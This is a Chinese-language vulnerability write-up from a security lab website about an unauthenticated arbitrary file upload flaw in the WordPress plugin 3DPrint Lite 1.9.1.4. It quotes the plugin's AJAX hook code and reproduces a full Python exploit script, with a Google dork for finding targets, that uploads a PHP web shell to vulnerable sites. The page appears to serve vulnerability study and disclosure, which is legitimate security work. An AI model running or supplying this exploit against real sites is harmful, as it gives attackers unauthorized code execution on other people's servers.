WordPress 3DPrint Lite 3dprint-lite-functions.php 任意文件上传漏洞

0460

漏洞描述

WordPress 3DPrint Lite Version 1.9.1.4 版本 中的 3dprint-lite-functions.php 文件存在文件上传漏洞,攻击者通过构造请求包可以上传任意文件获取服务器权限。

漏洞影响

3DPrint Lite Version 1.9.1.4 版本

插件名

3DPrint Lite

https://downloads.wordpress.org/plugin/3dprint-lite.1.9.1.4.zip

漏洞复现

首先看一下插件注册的接口

20231009161012420-png (6)

if ( is_admin() ) {
	add_action( 'admin_enqueue_scripts', 'p3dlite_enqueue_scripts_backend' );
	add_action( 'wp_ajax_p3dlite_handle_upload', 'p3dlite_handle_upload' );
	add_action( 'wp_ajax_nopriv_p3dlite_handle_upload', 'p3dlite_handle_upload' );
	include 'includes/3dprint-lite-admin.php';
}
else {
	add_action( 'wp_enqueue_scripts', 'p3dlite_enqueue_scripts_frontend' );
	include 'includes/3dprint-lite-frontend.php';
}

跟踪 p3dlite_handle_upload 方法 wp-content/plugins/3dprint-lite/includes/3dprint-lite-functions.php

20231009161046425-png (7)

向下看可以看到一个标准的文件上传代码

20231009161141349-png (8)

通过调试可以找到上传路径 /wp-content/uploads/p3d/

20231009161203963-png (9)

未授权调用 p3dlite_handle_upload 上传文件

# Exploit Title: WordPress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/3dprint-lite/
# Date: 22/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/3dprint-lite/
# Version: <= 1.9.1.4
# Tested on: Ubuntu 20.04.1

import os.path
from os import path
import json
import requests;
import sys

def print_banner():
	print("3DPrint Lite <= 1.9.1.4 - Arbitrary File Upload")
	print("Author -> spacehen (www.github.com/spacehen)")

def print_usage():
	print("Usage: python3 exploit.py [target url] [php file]")
	print("Ex: python3 exploit.py https://example.com ./shell.php")

def vuln_check(uri):
	response = requests.get(uri)
	raw = response.text
	if ("jsonrpc" in raw):
		return True;
	else:
		return False;

def main():

	print_banner()
	if(len(sys.argv) != 3):
		print_usage();
		sys.exit(1);

	base = sys.argv[1]
	file_path = sys.argv[2]

	ajax_action = 'p3dlite_handle_upload'
	admin = '/wp-admin/admin-ajax.php';

	uri = base + admin + '?action=' + ajax_action ;
	check = vuln_check(uri);

	if(check == False):
		print("(*) Target not vulnerable!");
		sys.exit(1)

	if( path.isfile(file_path) == False):
		print("(*) Invalid file!")
		sys.exit(1)

	files = {'file' : open(file_path)}
	print("Uploading Shell...");
	response = requests.post(uri, files=files)
	file_name = path.basename(file_path)
	if(file_name in response.text):
		print("Shell Uploaded!")
		if(base[-1] != '/'):
			base += '/'
		print(base + "wp-content/uploads/p3d/" + file_name);
	else:
		print("Shell Upload Failed")
		sys.exit(1)

main();

20231009161257473-png (10)

© 版权声明
本实验室所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 秋刀鱼实验室

使用声明 1、秋刀鱼实验室
2、使用本实验室相关内容时请严格遵守《中华人民共和国网络安全法》
3、本网站的文章部分内容可能来源于网络,仅供学习参考,如有侵权,请联系support@saury.net进行删除处理。
4、本网站的文章内容仅供学习使用,切勿进行非授权测试,文章阅读者行为与本站无关。
5、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
6、本站一律禁止以任何方式发布或转载任何违法的相关信息。
7、如发现文件链接失效,请联系我们第一时间更新。

THE END
应用软件漏洞
喜欢就支持一下吧
点赞0 分享
相关推荐
评论 抢沙发

请登录后发表评论

    暂无评论内容

推荐阅读
Rails sprockets 任意文件读取漏洞 #CVE-2018-3760-秋刀鱼实验室
2301人已阅读
Rails sprockets 任意文件读取漏洞 #CVE-2018-3760
TOP1
Go-fastdfs GetClientIp 未授权访问漏洞-秋刀鱼实验室
Go-fastdfs GetClientIp 未授权访问漏洞
2024-4-28 11:451134人已阅读
TOP2
PbootCMS domain SQL注入漏洞-秋刀鱼实验室
PbootCMS domain SQL注入漏洞
2023-11-21 17:03994人已阅读
TOP3
HiKVISION 综合安防管理平台 report 任意文件上传漏洞-秋刀鱼实验室
HiKVISION 综合安防管理平台 report 任意文件上传漏洞
2024-3-28 15:07889人已阅读
TOP4
致远OA 帆软组件 ReportServer 目录遍历漏洞-秋刀鱼实验室
致远OA 帆软组件 ReportServer 目录遍历漏洞
2023-12-14 11:20817人已阅读
TOP5
极致CMS 后台文件编辑插件 后台任意文件写入漏洞-秋刀鱼实验室
极致CMS 后台文件编辑插件 后台任意文件写入漏洞
2023-10-31 17:35604人已阅读
TOP6
Harbor 未授权创建管理员漏洞 #CVE-2019-16097-秋刀鱼实验室
Harbor 未授权创建管理员漏洞 #CVE-2019-16097
2024-4-4 15:03585人已阅读
TOP7
零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 #CNVD-2020-67113-秋刀鱼实验室
零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 #CNVD-2020-67113
2024-4-8 10:46579人已阅读
TOP8
信呼OA beifenAction.php 后台目录遍历漏洞-秋刀鱼实验室
信呼OA beifenAction.php 后台目录遍历漏洞
2024-3-11 15:18502人已阅读
TOP9
久其财务报表 download.jsp 任意文件读取漏洞-秋刀鱼实验室
久其财务报表 download.jsp 任意文件读取漏洞
2024-4-10 10:30476人已阅读
TOP10